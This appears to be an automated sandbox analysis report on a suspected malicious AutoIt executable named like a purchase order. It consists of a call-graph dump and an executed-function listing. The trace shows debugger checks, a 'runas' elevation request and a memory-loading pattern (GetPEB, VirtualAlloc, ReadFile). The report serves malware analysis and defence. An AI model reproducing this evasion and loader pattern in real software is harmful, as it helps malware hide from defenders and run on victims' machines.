105057->105058 105058->105059 105060 c1784b 59 API calls 105058->105060 105061 c14680 105059->105061 105063 c1465f 105059->105063 105074 c4d4fb 105059->105074 105064 c14636 105060->105064 105117 c1784b 105061->105117 105065 c179f2 59 API calls 105063->105065 105068 c17d2c 59 API calls 105064->105068 105069 c14669 105065->105069 105066 c14691 105070 c146a3 105066->105070 105072 c18047 59 API calls 105066->105072 105067 c4d5cb 105071 c17bcc 59 API calls 105067->105071 105068->105059 105069->105061 105075 c1784b 59 API calls 105069->105075 105073 c146b3 105070->105073 105076 c18047 59 API calls 105070->105076 105087 c4d588 105071->105087 105072->105070 105078 c146ba 105073->105078 105079 c18047 59 API calls 105073->105079 105074->105067 105077 c4d5b4 105074->105077 105085 c4d532 105074->105085 105075->105061 105076->105073 105077->105067 105082 c4d59f 105077->105082 105080 c18047 59 API calls 105078->105080 105089 c146c1 Mailbox 105078->105089 105079->105078 105080->105089 105081 c4d590 105083 c17bcc 59 API calls 105081->105083 105084 c17bcc 59 API calls 105082->105084 105083->105087 105084->105087 105085->105081 105090 c4d57b 105085->105090 105086 c179f2 59 API calls 105086->105087 105087->105061 105087->105086 105130 c17924 59 API calls 2 library calls 105087->105130 105089->104967 105091 c17bcc 59 API calls 105090->105091 105091->105087 105092->105013 105093->105013 105094->105013 105095->105013 105096->105013 105097->105013 105098->105013 105100 c15c79 105099->105100 105101 c15c88 105099->105101 105100->104992 105101->105100 105102 c15c8d CloseHandle 105101->105102 105102->105100 105103->104937 105104->104943 105105->104972 105106->105021 105107->105021 105108->105021 105109->105021 105110->105021 105111->105021 105112->104995 105113->104998 105114->105020 105115->105000 105116->105004 105118 c178b7 105117->105118 105119 c1785a 105117->105119 105120 c17d2c 59 API calls 105118->105120 105119->105118 105121 c17865 105119->105121 105122 c17888 _memmove 105120->105122 105123 c17880 105121->105123 105124 c4eb09 105121->105124 105122->105066 105131 c17f27 59 API calls Mailbox 105123->105131 105125 c18029 59 API calls 105124->105125 105127 c4eb13 105125->105127 105128 c30db6 Mailbox 59 API calls 105127->105128 105129 c4eb33 105128->105129 105130->105087 105131->105122 105133 c16d95 105132->105133 105134 c16ea9 105132->105134 105133->105134 105135 c30db6 Mailbox 59 API calls 105133->105135 105134->104018 105137 c16dbc 105135->105137 105136 c30db6 Mailbox 59 API calls 105142 c16e31 105136->105142 105137->105136 105142->105134 105145 c16240 105142->105145 105170 c1735d 59 API calls Mailbox 105142->105170 105171 c66553 59 API calls Mailbox 105142->105171 105172 c1750f 59 API calls 2 library calls 105142->105172 105143->104020 105144->104022 105146 c17a16 59 API calls 105145->105146 105165 c16265 105146->105165 105147 c1646a 105175 c1750f 59 API calls 2 library calls 105147->105175 105149 c16484 Mailbox 105149->105142 105152 c4dff6 105178 c6f8aa 91 API calls 4 library calls 105152->105178 105153 c17d8c 59 API calls 105153->105165 105156 c1750f 59 API calls 105156->105165 105158 c4e004 105179 c1750f 59 API calls 2 library calls 105158->105179 105160 c4e01a 105160->105149 105161 c16799 _memmove 105180 c6f8aa 91 API calls 4 library calls 105161->105180 105162 c4df92 105163 c18029 59 API calls 105162->105163 105164 c4df9d 105163->105164 105169 c30db6 Mailbox 59 API calls 105164->105169 105165->105147 105165->105152 105165->105153 105165->105156 105165->105161 105165->105162 105167 c17e4f 59 API calls 105165->105167 105173 c15f6c 60 API calls 105165->105173 105174 c15d41 59 API calls Mailbox 105165->105174 105176 c15e72 60 API calls 105165->105176 105177 c17924 59 API calls 2 library calls 105165->105177 105168 c1643b CharUpperBuffW 105167->105168 105168->105165 105169->105161 105170->105142 105171->105142 105172->105142 105173->105165 105174->105165 105175->105149 105176->105165 105177->105165 105178->105158 105179->105160 105180->105149 105181->104036 105182->104037 105184 c1e6d5 105183->105184 105185 c53aa9 105184->105185 105188 c1e73f 105184->105188 105197 c1e799 105184->105197 105274 c19ea0 105185->105274 105187 c53abe 105213 c1e970 Mailbox 105187->105213 105298 c79e4a 89 API calls 4 library calls 105187->105298 105191 c17667 59 API calls 105188->105191 105188->105197 105189 c17667 59 API calls 105189->105197 105192 c53b04 105191->105192 105194 c32d40 __cinit 67 API calls 105192->105194 105193 c32d40 __cinit 67 API calls 105193->105197 105194->105197 105195 c53b26 105195->104058 105196 c184c0 69 API calls 105196->105213 105197->105189 105197->105193 105197->105195 105198 c1e95a 105197->105198 105197->105213 105198->105213 105299 c79e4a 89 API calls 4 library calls 105198->105299 105199 c19ea0 331 API calls 105199->105213 105201 c18d40 59 API calls 105201->105213 105208 c1f195 105303 c79e4a 89 API calls 4 library calls 105208->105303 105210 c53e25 105210->104058 105211 c79e4a 89 API calls 105211->105213 105212 c1ea78 105212->104058 105213->105196 105213->105199 105213->105201 105213->105208 105213->105211 105213->105212 105273 c17f77 59 API calls 2 library calls 105213->105273 105300 c66e8f 59 API calls 105213->105300 105301 c8c5c3 331 API calls 105213->105301 105302 c8b53c 331 API calls Mailbox 105213->105302 105304 c19c90 59 API calls Mailbox 105213->105304 105305 c893c6 331 API calls Mailbox 105213->105305 105215 c1f650 105214->105215 105216 c1f4ba 105214->105216 105217 c17de1 59 API calls 105215->105217 105218 c1f4c6 105216->105218 105219 c5441e 105216->105219 105225 c1f58c Mailbox 105217->105225 105404 c1f290 331 API calls 2 library calls 105218->105404 105406 c8bc6b 331 API calls Mailbox 105219->105406 105222 c5442c 105226 c1f630 105222->105226 105407 c79e4a 89 API calls 4 library calls 105222->105407 105224 c1f4fd 105224->105222 105224->105225 105224->105226 105231 c14e4a 84 API calls 105225->105231 105312 c7cb7a 105225->105312 105392 c8445a 105225->105392 105401 c73c37 105225->105401 105226->104058 105228 c1f5e3 105228->105226 105405 c19c90 59 API calls Mailbox 105228->105405 105231->105228 105233->104058 105234->104058 105235->104058 105236->104046 105237->104050 105238->104058 105239->104054 105240->104054 105241->104054 105242->104058 105243->104058 105244->104058 105246 c19851 105245->105246 105247 c1984b 105245->105247 105248 c4f5d3 __i64tow 105246->105248 105249 c19899 105246->105249 105251 c19857 __itow 105246->105251 105254 c4f4da 105246->105254 105247->104058 105564 c33698 83 API calls 3 library calls 105249->105564 105253 c30db6 Mailbox 59 API calls 105251->105253 105255 c19871 105253->105255 105256 c4f552 Mailbox _wcscpy 105254->105256 105257 c30db6 Mailbox 59 API calls 105254->105257 105255->105247 105258 c17de1 59 API calls 105255->105258 105565 c33698 83 API calls 3 library calls 105256->105565 105259 c4f51f 105257->105259 105258->105247 105260 c30db6 Mailbox 59 API calls 105259->105260 105261 c4f545 105260->105261 105261->105256 105262 c17de1 59 API calls 105261->105262 105262->105256 105263->104058 105264->104058 105265->104058 105266->104070 105267->104070 105268->104070 105269->104070 105270->104070 105271->104070 105272->104070 105273->105213 105275 c19ebf 105274->105275 105293 c19eed Mailbox 105274->105293 105276 c30db6 Mailbox 59 API calls 105275->105276 105276->105293 105277 c1b475 105278 c18047 59 API calls 105277->105278 105294 c1a057 105278->105294 105279 c1b47a 105280 c509e5 105279->105280 105281 c50055 105279->105281 105311 c79e4a 89 API calls 4 library calls 105280->105311 105308 c79e4a 89 API calls 4 library calls 105281->105308 105283 c1a55a 105309 c79e4a 89 API calls 4 library calls 105283->105309 105285 c30db6 59 API calls Mailbox 105285->105293 105287 c50064 105287->105187 105288 c32d40 67 API calls __cinit 105288->105293 105291 c17667 59 API calls 105291->105293 105292 c18047 59 API calls 105292->105293 105293->105277 105293->105279 105293->105281 105293->105283 105293->105285 105293->105288 105293->105291 105293->105292 105293->105294 105295 c66e8f 59 API calls 105293->105295 105296 c509d6 105293->105296 105306 c1c8c0 331 API calls 2 library calls 105293->105306 105307 c1b900 60 API calls Mailbox 105293->105307 105294->105187 105295->105293 105310 c79e4a 89 API calls 4 library calls 105296->105310 105298->105213 105299->105213 105300->105213 105301->105213 105302->105213 105303->105210 105304->105213 105305->105213 105306->105293 105307->105293 105308->105287 105309->105294 105310->105280 105311->105294 105313 c17667 59 API calls 105312->105313 105314 c7cbaf 105313->105314 105315 c17667 59 API calls 105314->105315 105316 c7cbb8 105315->105316 105317 c7cbcc 105316->105317 105517 c19b3c 59 API calls 105316->105517 105319 c19837 84 API calls 105317->105319 105320 c7cbe9 105319->105320 105321 c7cc0b 105320->105321 105322 c7ccea 105320->105322 105327 c7cd1a Mailbox 105320->105327 105323 c19837 84 API calls 105321->105323 105324 c14ddd 136 API calls 105322->105324 105325 c7cc17 105323->105325 105326 c7ccfe 105324->105326 105328 c18047 59 API calls 105325->105328 105329 c7cd16 105326->105329 105332 c14ddd 136 API calls 105326->105332 105327->105228 105331 c7cc23 105328->105331 105329->105327 105330 c17667 59 API calls 105329->105330 105333 c7cd4b 105330->105333 105335 c7cc37 105331->105335 105336 c7cc69 105331->105336 105332->105329 105334 c17667 59 API calls 105333->105334 105337 c7cd54 105334->105337 105338 c18047 59 API calls 105335->105338 105339 c19837 84 API calls 105336->105339 105340 c17667 59 API calls 105337->105340 105341 c7cc47 105338->105341 105342 c7cc76 105339->105342 105343 c7cd5d 105340->105343 105344 c17cab 59 API calls 105341->105344 105345 c18047 59 API calls 105342->105345 105346 c17667 59 API calls 105343->105346 105347 c7cc51 105344->105347 105348 c7cc82 105345->105348 105349 c7cd66 105346->105349 105350 c19837 84 API calls 105347->105350 105518 c74a31 GetFileAttributesW 105348->105518 105352 c19837 84 API calls 105349->105352 105354 c7cc5d 105350->105354 105353 c7cd73 105352->105353 105356 c1459b 59 API calls 105353->105356 105357 c17b2e 59 API calls 105354->105357 105355 c7cc8b 105358 c7cc9e 105355->105358 105359 c179f2 59 API calls 105355->105359 105360 c7cd8e 105356->105360 105357->105336 105361 c19837 84 API calls 105358->105361 105367 c7cca4 105358->105367 105359->105358 105362 c179f2 59 API calls 105360->105362 105363 c7cccb 105361->105363 105364 c7cd9d 105362->105364 105519 c737ef 75 API calls Mailbox 105363->105519 105366 c7cdd1 105364->105366 105368 c179f2 59 API calls 105364->105368 105369 c18047 59 API calls 105366->105369 105367->105327 105370 c7cdae 105368->105370 105371 c7cddf 105369->105371 105370->105366 105374 c17bcc 59 API calls 105370->105374 105372 c17b2e 59 API calls 105371->105372 105373 c7cded 105372->105373 105375 c17b2e 59 API calls 105373->105375 105376 c7cdc3 105374->105376 105377 c7cdfb 105375->105377 105378 c17bcc 59 API calls 105376->105378 105379 c17b2e 59 API calls 105377->105379 105378->105366 105380 c7ce09 105379->105380 105381 c19837 84 API calls 105380->105381 105382 c7ce15 105381->105382 105408 c74071 105382->105408 105384 c7ce26 105385 c73c37 3 API calls 105384->105385 105386 c7ce30 105385->105386 105387 c19837 84 API calls 105386->105387 105390 c7ce61 105386->105390 105388 c7ce4e 105387->105388 105462 c79155 105388->105462 105391 c14e4a 84 API calls 105390->105391 105391->105327 105393 c19837 84 API calls 105392->105393 105394 c84494 105393->105394 105395 c16240 94 API calls 105394->105395 105396 c844a4 105395->105396 105397 c844c9 105396->105397 105398 c19ea0 331 API calls 105396->105398 105400 c844cd 105397->105400 105559 c19a98 59 API calls Mailbox 105397->105559 105398->105397 105400->105228 105560 c7445a GetFileAttributesW 105401->105560 105404->105224 105405->105228 105406->105222 105407->105226 105409 c7408d 105408->105409 105410 c74092 105409->105410 105411 c740a0 105409->105411 105413 c18047 59 API calls 105410->105413 105412 c17667 59 API calls 105411->105412 105414 c740a8 105412->105414 105461 c7409b Mailbox 105413->105461 105415 c17667 59 API calls 105414->105415 105416 c740b0 105415->105416 105417 c17667 59 API calls 105416->105417 105418 c740bb 105417->105418 105419 c17667 59 API calls 105418->105419 105420 c740c3 105419->105420 105421 c17667 59 API calls 105420->105421 105422 c740cb 105421->105422 105423 c17667 59 API calls 105422->105423 105424 c740d3 105423->105424 105425 c17667 59 API calls 105424->105425 105426 c740db 105425->105426 105427 c17667 59 API calls 105426->105427 105428 c740e3 105427->105428 105429 c1459b 59 API calls 105428->105429 105430 c740fa 105429->105430 105431 c1459b 59 API calls 105430->105431 105432 c74113 105431->105432 105433 c179f2 59 API calls 105432->105433 105434 c7411f 105433->105434 105461->105384 105463 c79162 __write_nolock 105462->105463 105464 c30db6 Mailbox 59 API calls 105463->105464 105465 c791bf 105464->105465 105466 c1522e 59 API calls 105465->105466 105467 c791c9 105466->105467 105468 c78f5f GetSystemTimeAsFileTime 105467->105468 105469 c791d4 105468->105469 105470 c14ee5 85 API calls 105469->105470 105471 c791e7 _wcscmp 105470->105471 105472 c7920b 105471->105472 105473 c792b8 105471->105473 105474 c79734 96 API calls 105472->105474 105475 c79734 96 API calls 105473->105475 105476 c79210 105474->105476 105490 c79284 _wcscat 105475->105490 105479 c792c1 105476->105479 105539 c340fb 58 API calls __wsplitpath_helper 105476->105539 105478 c14f0b 74 API calls 105480 c792dd 105478->105480 105479->105390 105481 c14f0b 74 API calls 105480->105481 105482 c79239 _wcscat _wcscpy 105490->105478 105490->105479 105517->105317 105518->105355 105519->105367 105539->105482 105559->105400 105561 c73c3e 105560->105561 105562 c74475 FindFirstFileW 105560->105562 105561->105228 105562->105561 105563 c7448a FindClose 105562->105563 105563->105561 105564->105251 105565->105248 105566 17e164b 105569 17e12c0 105566->105569 105568 17e1697 105582 17decf0 105569->105582 105572 17e1390 CreateFileW 105574 17e139d 105572->105574 105579 17e135f 105572->105579 105573 17e13b9 VirtualAlloc 105573->105574 105575 17e13da ReadFile 105573->105575 105576 17e15ac VirtualFree 105574->105576 105577 17e15ba 105574->105577 105575->105574 105578 17e13f8 VirtualAlloc 105575->105578 105576->105577 105577->105568 105578->105574 105578->105579 105579->105573 105579->105574 105580 17e14c0 CloseHandle 105579->105580 105581 17e14d0 VirtualFree 105579->105581 105585 17e21d0 GetPEB 105579->105585 105580->105579 105581->105579 105587 17e2170 GetPEB 105582->105587 105584 17df37b 105584->105579 105586 17e21fa 105585->105586 105586->105572 105588 17e219a 105587->105588 105588->105584 105589 c11066 105594 c1f76f 105589->105594 105591 c1106c 105592 c32d40 __cinit 67 API calls 105591->105592 105593 c11076 105592->105593 105595 c1f790 105594->105595 105627 c2ff03 105595->105627 105599 c1f7d7 105600 c17667 59 API calls 105599->105600 105601 c1f7e1 105600->105601 105602 c17667 59 API calls 105601->105602 105603 c1f7eb 105602->105603 105604 c17667 59 API calls 105603->105604 105605 c1f7f5 105604->105605 105606 c17667 59 API calls 105605->105606 105607 c1f833 105606->105607 105608 c17667 59 API calls 105607->105608 105609 c1f8fe 105608->105609 105637 c25f87 105609->105637 105613 c1f930 105614 c17667 59 API calls 105613->105614 105615 c1f93a 105614->105615 105665 c2fd9e 105615->105665 105617 c1f981 105618 c1f991 GetStdHandle 105617->105618 105619 c1f9dd 105618->105619 105620 c545ab 105618->105620 105621 c1f9e5 OleInitialize 105619->105621 105620->105619 105622 c545b4 105620->105622 105621->105591 105672 c76b38 64 API calls Mailbox 105622->105672 105624 c545bb 105673 c77207 CreateThread 105624->105673 105626 c545c7 CloseHandle 105626->105621 105674 c2ffdc 105627->105674 105630 c2ffdc 59 API calls 105631 c2ff45 105630->105631 105632 c17667 59 API calls 105631->105632 105633 c2ff51 105632->105633 105634 c17bcc 59 API calls 105633->105634 105635 c1f796 105634->105635 105636 c30162 6 API calls 105635->105636 105636->105599 105638 c17667 59 API calls 105637->105638 105639 c25f97 105638->105639 105640 c17667 59 API calls 105639->105640 105641 c25f9f 105640->105641 105681 c25a9d 105641->105681 105644 c25a9d 59 API calls 105645 c25faf 105644->105645 105646 c17667 59 API calls 105645->105646 105647 c25fba 105646->105647 105648 c30db6 Mailbox 59 API calls 105647->105648 105649 c1f908 105648->105649 105650 c260f9 105649->105650 105651 c26107 105650->105651 105652 c17667 59 API calls 105651->105652 105653 c26112 105652->105653 105654 c17667 59 API calls 105653->105654 105655 c2611d 105654->105655 105656 c17667 59 API calls 105655->105656 105657 c26128 105656->105657 105658 c17667 59 API calls 105657->105658 105659 c26133 105658->105659 105660 c25a9d 59 API calls 105659->105660 105661 c2613e 105660->105661 105662 c30db6 Mailbox 59 API calls 105661->105662 105663 c26145 RegisterWindowMessageW 105662->105663 105663->105613 105666 c6576f 105665->105666 105667 c2fdae 105665->105667 105684 c79ae7 60 API calls 105666->105684 105669 c30db6 Mailbox 59 API calls 105667->105669 105671 c2fdb6 105669->105671 105670 c6577a 105671->105617 105672->105624 105673->105626 105685 c771ed 65 API calls 105673->105685 105675 c17667 59 API calls 105674->105675 105676 c2ffe7 105675->105676 105677 c17667 59 API calls 105676->105677 105678 c2ffef 105677->105678 105679 c17667 59 API calls 105678->105679 105680 c2ff3b 105679->105680 105680->105630 105682 c17667 59 API calls 105681->105682 105683 c25aa5 105682->105683 105683->105644 105684->105670 105686 c11016 105691 c14974 105686->105691 105689 c32d40 __cinit 67 API calls 105690 c11025 105689->105690 105692 c30db6 Mailbox 59 API calls 105691->105692 105693 c1497c 105692->105693 105694 c1101b 105693->105694 105698 c14936 105693->105698 105694->105689 105699 c14951 105698->105699 105700 c1493f 105698->105700 105702 c149a0 105699->105702 105701 c32d40 __cinit 67 API calls 105700->105701 105701->105699 105703 c17667 59 API calls 105702->105703 105704 c149b8 GetVersionExW 105703->105704 105705 c17bcc 59 API calls 105704->105705 105706 c149fb 105705->105706 105707 c17d2c 59 API calls 105706->105707 105712 c14a28 105706->105712 105708 c14a1c 105707->105708 105709 c17726 59 API calls 105708->105709 105709->105712 105710 c14a93 GetCurrentProcess IsWow64Process 105711 c14aac 105710->105711 105714 c14ac2 105711->105714 105715 c14b2b GetSystemInfo 105711->105715 105712->105710 105713 c4d864 105712->105713 105726 c14b37 105714->105726 105717 c14af8 105715->105717 105717->105694 105719 c14ad4 105721 c14b37 2 API calls 105719->105721 105720 c14b1f GetSystemInfo 105722 c14ae9 105720->105722 105723 c14adc GetNativeSystemInfo 105721->105723 105722->105717 105724 c14aef FreeLibrary 105722->105724 105723->105722 105724->105717 105727 c14ad0 105726->105727 105728 c14b40 LoadLibraryA 105726->105728 105727->105719 105727->105720 105728->105727 105729 c14b51 GetProcAddress 105728->105729 105729->105727 105730 c4fdfc 105734 c1ab30 Mailbox _memmove 105730->105734 105735 c1b525 105734->105735 105755 c1a057 105734->105755 105756 c17de1 59 API calls 105734->105756 105758 c19f37 Mailbox 105734->105758 105763 c1b2b6 105734->105763 105765 c19ea0 331 API calls 105734->105765 105766 c5086a 105734->105766 105768 c50878 105734->105768 105770 c5085c 105734->105770 105771 c1b21c 105734->105771 105773 c30db6 59 API calls Mailbox 105734->105773 105775 c66e8f 59 API calls 105734->105775 105779 c8df23 105734->105779 105782 c8df37 105734->105782 105787 c19c90 59 API calls Mailbox 105734->105787 105791 c8c193 85 API calls 2 library calls 105734->105791 105792 c8c2e0 96 API calls Mailbox 105734->105792 105793 c77956 59 API calls Mailbox 105734->105793 105794 c8bc6b 331 API calls Mailbox 105734->105794 105795 c6617e 59 API calls Mailbox 105734->105795 105797 c79e4a 89 API calls 4 library calls 105735->105797 105738 c30db6 59 API calls Mailbox 105738->105758 105739 c509e5 105803 c79e4a 89 API calls 4 library calls 105739->105803 105740 c50055 105796 c79e4a 89 API calls 4 library calls 105740->105796 105744 c50064 105745 c1b475 105749 c18047 59 API calls 105745->105749 105746 c18047 59 API calls 105746->105758 105749->105755 105750 c1b47a 105750->105739 105750->105740 105752 c17667 59 API calls 105752->105758 105753 c66e8f 59 API calls 105753->105758 105754 c32d40 67 API calls __cinit 105754->105758 105756->105734 105757 c509d6 105802 c79e4a 89 API calls 4 library calls 105757->105802 105758->105738 105758->105740 105758->105745 105758->105746 105758->105750 105758->105752 105758->105753 105758->105754 105758->105755 105758->105757 105760 c1a55a 105758->105760 105785 c1c8c0 331 API calls 2 library calls 105758->105785 105786 c1b900 60 API calls Mailbox 105758->105786 105801 c79e4a 89 API calls 4 library calls 105760->105801 105790 c1f6a3 331 API calls 105763->105790 105765->105734 105799 c19c90 59 API calls Mailbox 105766->105799 105800 c79e4a 89 API calls 4 library calls 105768->105800 105770->105755 105798 c6617e 59 API calls Mailbox 105770->105798 105788 c19d3c 60 API calls Mailbox 105771->105788 105773->105734 105774 c1b22d 105789 c19d3c 60 API calls Mailbox 105774->105789 105775->105734 105804 c8cadd 105779->105804 105781 c8df33 105781->105734 105783 c8cadd 130 API calls 105782->105783 105784 c8df47 105783->105784 105784->105734 105785->105758 105786->105758 105787->105734 105788->105774 105789->105763 105790->105735 105791->105734 105792->105734 105793->105734 105794->105734 105795->105734 105796->105744 105797->105770 105798->105755 105799->105770 105800->105770 105801->105755 105802->105739 105803->105755 105805 c19837 84 API calls 105804->105805 105806 c8cb1a 105805->105806 105811 c8cb61 Mailbox 105806->105811 105842 c8d7a5 105806->105842 105808 c8cbb2 Mailbox 105808->105811 105815 c19837 84 API calls 105808->105815 105829 c8cdb9 105808->105829 105874 c8fbce 59 API calls 2 library calls 105808->105874 105875 c8cfdf 61 API calls 2 library calls 105808->105875 105809 c8cf2e 105881 c8d8c8 92 API calls Mailbox 105809->105881 105811->105781 105813 c8cf3d 105814 c8cdc7 105813->105814 105817 c8cf49 105813->105817 105855 c8c96e 105814->105855 105815->105808 105817->105811 105821 c8ce00 105870 c30c08 105821->105870 105824 c8ce1a 105876 c79e4a 89 API calls 4 library calls 105824->105876 105825 c8ce33 105827 c192ce 59 API calls 105825->105827 105830 c8ce3f 105827->105830 105828 c8ce25 GetCurrentProcess TerminateProcess 105828->105825 105829->105809 105829->105814 105831 c19050 59 API calls 105830->105831 105832 c8ce55 105831->105832 105841 c8ce7c 105832->105841 105877 c18d40 59 API calls Mailbox 105832->105877 105834 c8cfa4 105834->105811 105838 c8cfb8 FreeLibrary 105834->105838 105835 c8ce6b 105878 c8d649 107 API calls _free 105835->105878 105838->105811 105841->105834 105879 c18d40 59 API calls Mailbox 105841->105879 105880 c19d3c 60 API calls Mailbox 105841->105880 105882 c8d649 107 API calls _free 105841->105882 105843 c17e4f 59 API calls 105842->105843 105844 c8d7c0 CharLowerBuffW 105843->105844 105883 c6f167 105844->105883 105848 c17667 59 API calls 105849 c8d7f9 105848->105849 105850 c1784b 59 API calls 105849->105850 105852 c8d810 105850->105852 105851 c8d858 Mailbox 105851->105808 105853 c17d2c 59 API calls 105852->105853 105854 c8d81c Mailbox 105853->105854 105854->105851 105890 c8cfdf 61 API calls 2 library calls 105854->105890 105856 c8c989 105855->105856 105860 c8c9de 105855->105860 105857 c30db6 Mailbox 59 API calls 105856->105857 105859 c8c9ab 105857->105859 105858 c30db6 Mailbox 59 API calls 105858->105859 105859->105858 105859->105860 105861 c8da50 105860->105861 105862 c8dc79 Mailbox 105861->105862 105869 c8da73 _strcat _wcscpy __wsetenvp 105861->105869 105862->105821 105863 c19b3c 59 API calls 105863->105869 105864 c19b98 59 API calls 105864->105869 105865 c19be6 59 API calls 105865->105869 105866 c19837 84 API calls 105866->105869 105867 c3571c 58 API calls __malloc_crt 105867->105869 105869->105862 105869->105863 105869->105864 105869->105865 105869->105866 105869->105867 105893 c75887 61 API calls 2 library calls 105869->105893 105871 c30c1d 105870->105871 105872 c30cb5 VirtualProtect 105871->105872 105873 c30c83 105871->105873 105872->105873 105873->105824 105873->105825 105874->105808 105875->105808 105876->105828 105877->105835 105878->105841 105879->105841 105880->105841 105881->105813 105882->105841 105885 c6f192 __wsetenvp 105883->105885 105884 c6f1d1 105884->105848 105884->105854 105885->105884 105886 c6f278 105885->105886 105887 c6f1c7 105885->105887 105886->105884 105892 c178c4 61 API calls 105886->105892 105887->105884 105891 c178c4 61 API calls 105887->105891 105890->105851 105891->105887 105892->105886 105893->105869 105894 c5416f 105898 c65fe6 105894->105898 105896 c5417a 105897 c65fe6 85 API calls 105896->105897 105897->105896 105899 c66020 105898->105899 105903 c65ff3 105898->105903 105899->105896 105900 c66022 105910 c19328 84 API calls Mailbox 105900->105910 105901 c66027 105904 c19837 84 API calls 105901->105904 105903->105899 105903->105900 105903->105901 105907 c6601a 105903->105907 105905 c6602e 105904->105905 105906 c17b2e 59 API calls 105905->105906 105906->105899 105909 c195a0 59 API calls _wcsstr 105907->105909 105909->105899 105910->105901 105911 c1107d 105916 c1708b 105911->105916 105913 c1108c 105914 c32d40 __cinit 67 API calls 105913->105914 105915 c11096 105914->105915 105917 c1709b __write_nolock 105916->105917 105918 c17667 59 API calls 105917->105918 105919 c17151 105918->105919 105920 c14706 61 API calls 105919->105920 105921 c1715a 105920->105921 105947 c3050b 105921->105947 105924 c17cab 59 API calls 105925 c17173 105924->105925 105926 c13f74 59 API calls 105925->105926 105927 c17182 105926->105927 105928 c17667 59 API calls 105927->105928 105929 c1718b 105928->105929 105930 c17d8c 59 API calls 105929->105930 105931 c17194 RegOpenKeyExW 105930->105931 105932 c4e8b1 RegQueryValueExW 105931->105932 105933 c171b6 Mailbox 105931->105933 105934 c4e943 RegCloseKey 105932->105934 105935 c4e8ce 105932->105935 105933->105913 105934->105933 105946 c4e955 _wcscat Mailbox __wsetenvp 105934->105946 105936 c30db6 Mailbox 59 API calls 105935->105936 105937 c4e8e7 105936->105937 105939 c1522e 59 API calls 105937->105939 105938 c179f2 59 API calls 105938->105946 105940 c4e8f2 RegQueryValueExW 105939->105940 105941 c4e90f 105940->105941 105943 c4e929 105940->105943 105942 c17bcc 59 API calls 105941->105942 105942->105943 105943->105934 105944 c17de1 59 API calls 105944->105946 105945 c13f74 59 API calls 105945->105946 105946->105933 105946->105938 105946->105944 105946->105945 105948 c41940 __write_nolock 105947->105948 105949 c30518 GetFullPathNameW 105948->105949 105950 c3053a 105949->105950 105951 c17bcc 59 API calls 105950->105951 105952 c17165 105951->105952 105952->105924 105953 17e10a0 105954 17decf0 GetPEB 105953->105954 105955 17e113e 105954->105955 105967 17e0f90 105955->105967 105968 17e0f99 Sleep 105967->105968 105969 17e0fa7 105968->105969

                                                                    Executed Functions

                                                                    Function 00C13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00C13B7A
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                      • Part of subcall function 00C2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C13C14,00CD52F8,?,?,?), ref: 00C2096E
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CC7770,00000010), ref: 00C4D281
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00CD52F8,?,?,?), ref: 00C4D2B9
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CC4260,00CD52F8,?,?,?), ref: 00C4D33F
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C4D346
                                                                      • Part of subcall function 00C13A46: GetSysColorBrush.USER32(0000000F), ref: 00C13A50
                                                                      • Part of subcall function 00C13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
                                                                      • Part of subcall function 00C13A46: LoadIconW.USER32(00000063), ref: 00C13A76
                                                                      • Part of subcall function 00C13A46: LoadIconW.USER32(000000A4), ref: 00C13A88
                                                                      • Part of subcall function 00C13A46: LoadIconW.USER32(000000A2), ref: 00C13A9A
                                                                      • Part of subcall function 00C13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
                                                                      • Part of subcall function 00C13A46: RegisterClassExW.USER32(?), ref: 00C13B16
                                                                      • Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
                                                                      • Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
                                                                      • Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A38
                                                                      • Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A41
                                                                      • Part of subcall function 00C1434A: _memset.LIBCMT ref: 00C14370
                                                                      • Part of subcall function 00C1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
                                                                    Strings
                                                                    • runas, xrefs: 00C4D33A
                                                                    • This is a third-party compiled AutoIt script., xrefs: 00C4D279
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                    • API String ID: 529118366-3287110873
                                                                    • Opcode ID: 70a133d286b338bf7d5f46d7a3b41b98d663499dc1603292ab0b86fafb230f49
